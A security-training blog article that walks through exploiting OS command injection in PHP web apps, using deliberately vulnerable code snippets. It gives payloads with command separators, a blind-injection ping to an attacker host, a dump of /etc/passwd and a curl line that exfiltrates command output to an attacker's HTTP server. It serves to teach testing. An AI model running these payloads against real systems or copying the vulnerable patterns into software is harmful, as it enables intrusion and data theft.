Secure coding

Command Injection Vulnerabilities Exploitation Case Study

October 19, 2020 by Srinivas

Introduction:

This article provides an overview of how command injection vulnerabilities can be identified and exploited. We will discuss two different types of Command injection vulnerabilities. The first being standard command injection with responses shown to the attacker and the second one being blind command injection. The standard Command Injection vulnerabilities with command output in response are easy to discover whereas Blind Command Injection vulnerabilities are slightly tricky and it’s important to understand the techniques to discover and exploit them.

Exploiting Simple Command Injection

The following example shows a simple Command Injection vulnerability, where the web application gets user input and executes it as a command on the underlying operating system.

<?php

$cmd=$_GET[‘cmd’];

system($cmd);

?>

 

As we can notice from the preceding code snippet, the user input is passed to the php system() function, which is used to execute operating system commands in PHP. 

Now, one can simply use the following URL with arbitrary commands to exploit this application.

Let us consider the following URL of an application, which performs base64 encoding of user input.

http://target-site.com/vulnerable.php?cmd=id

 

When the preceding URL is accessed, the application responds with the following output, confirming that commands can be executed on the underlying host.

uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

Exploiting Command Injection by Terminating Existing Commands:

In the previous section, we discussed how to exploit a simple web application that receives commands from the user and executes them on the underlying host. In the real world, Command injection vulnerabilities may not always be found that easily. They often require completing the existing command and adding additional commands by using a command separator. Let us consider the following example.

<?php

    // Get input

    $target = $_REQUEST[ ‘ip’ ];

    // Execute user input

    $cmd = shell_exec( ‘ping  -c 4 ‘ . $target );

    // Show the response back to the user

    echo $cmd;

?>

 

As we can notice in the preceding code snippet, the application takes an IP address as input and appends it to ping -c 4 command on a Linux host. It then displays the output back to the user using the line echo $cmd.

The following URL shows how a user can use this application. 

http://target-site.com/vulnerable.php?ip=127.0.0.1

 

The user receives the following as the output.

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.025 ms 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.032 ms 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.028 ms 

— 127.0.0.1 ping statistics — 

4 packets transmitted, 4 received, 0% packet loss, time 3056ms rtt min/avg/max/mdev = 0.015/0.025/0.032/0.006 ms 

 

As you can notice in the preceding excerpt, a ping command is executed against the supplied IP Address by the web application. 

Let us try to replace the ip address with an OS command as follows.

http://target-site.com/vulnerable.php?ip=id

 

It does not show any response as the application expects an IP Address to be able to execute ping command. In this case, the application executes the following, which does not produce any result.

ping -c 4 id

 

This is where we can make use of command separators to complete ping command successfully and then execute user supplied commands. Following are some of the command separators we can use on UNIX based targets.

&

&&

|

||

;

 

Now, let us understand how one can use these command separators to exploit the command injection vulnerability in the code snippet shown earlier.

Following is the URL with updated command injection payload.

http://target-site.com/vulnerable.php?ip=127.0.0.1;id

 

Notice how command separator ” ;” is used between the two values supplied by the user.

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.088 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.034 ms 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.026 ms 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.050 ms 

— 127.0.0.1 ping statistics — 4 packets transmitted, 4 received, 0% packet loss, time 3077ms rtt min/avg/max/mdev = 0.026/0.049/0.088/0.023 ms 

uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

Notice the preceding excerpt and the user supplied command got executed, when supplied using a command separator. Following is the command formed when the preceding payload is supplied.

ping -c 4 127.0.0.1;id

 

We are simply executing two different commands in one shell using a command separator. This is a legitimate way of executing multiple commands in UNIX based machines and thus the trick worked.

Exploiting Blind Command Injection:

Finding command injection vulnerabilities that show the command output in HTTP response is often easy. The problem arises when there is no output being shown in the HTTP Response, even when arbitrary commands are executed. This is called Blind Command Injection. Let us try to understand how we can exploit such vulnerabilities. Let us consider the following example.

<?php

    // Get input

    $target = $_REQUEST[ ‘ip’ ];

    // Execute user input

    $cmd = shell_exec( ‘ping  -c 4 ‘ . $target );

    // Show the response back to the user

    echo “Ping Completed”;

?>

 

The preceding code snippet only displays the message “Ping Completed” in every case and we will not get any command output in HTTP Response in this case.

Let us execute the following command.

http://target-site.com/vulnerable.php?ip=127.0.0.1;id

 

Even though the command id is executed, the output of id command is not shown in the web page. 

One of the first things we can do to confirm this type of Command Injection vulnerabilities is to execute a command that makes network interaction with the server. 

Let us try to ping the attacker’s host using the following payload.

http://target-site.com/vulnerable.php?ip=127.0.0.1;ping -c 3 [attacker’s ip]

 

This looks as follows in the attacker’s browser.

If the above payload gets executed on the victim’s server, it will send 3 ICMP packets to the attacker’s server.

To confirm that, launch Wireshark on the attacker’s machine and filter the packets using the string icmp. This looks as follows.

As we can notice the ping command got executed on the target server and it confirms that the command execution is possible. Now, the next step is obviously to execute useful commands and see their output. We can use several techniques to get the output of the commands. Let us consider the following payload.

http://target-site.com/vulnerable.php?ip=127.0.0.1;cat /etc/passwd>out.txt

 

This payload adds the content of /etc/passwd file to out.txt file.

We can access the output by accessing the out.txt file, which is saved in the webroot.

It is also possible to exfiltrate data over the network directly without saving it to the disk. Let us consider the following payload.

http://target-site.com/vulnerable.php?ip=127.0.0.1;curl “http://192.168.1.110:8000/?data=”`whoami`

 

When executed, it looks as follows. 

If we notice the access logs, we should notice the data being exfiltrated as shown below.

root@kali:~# python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) …

192.168.1.91 – – [02/Oct/2020 10:19:15] code 404, message File not found

192.168.1.91 – – [02/Oct/2020 10:19:15] “GET /?data=docker HTTP/1.1” 200 –

Conclusion:

This article has provided a detailed overview of how command injection vulnerabilities can be exploited. We have seen techniques to exploit standard command injection as well as Blind Command Injection vulnerabilities. 

 

Sources

  1. https://owasp.org/www-community/attacks/Command_Injection
  2. https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
  3. https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection

 

Posted: October 19, 2020
Articles Author
Srinivas
View Profile

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds Offensive Security Certified Professional(OSCP) Certification. He blogs atwww.androidpentesting.com. Email: srini0x00@gmail.com


Notice: Undefined index: visitor_id12882 in /www/resourcesinfosecinstitute_601/public/wp-content/plugins/infosec-user-info/infosec-user-info.php on line 117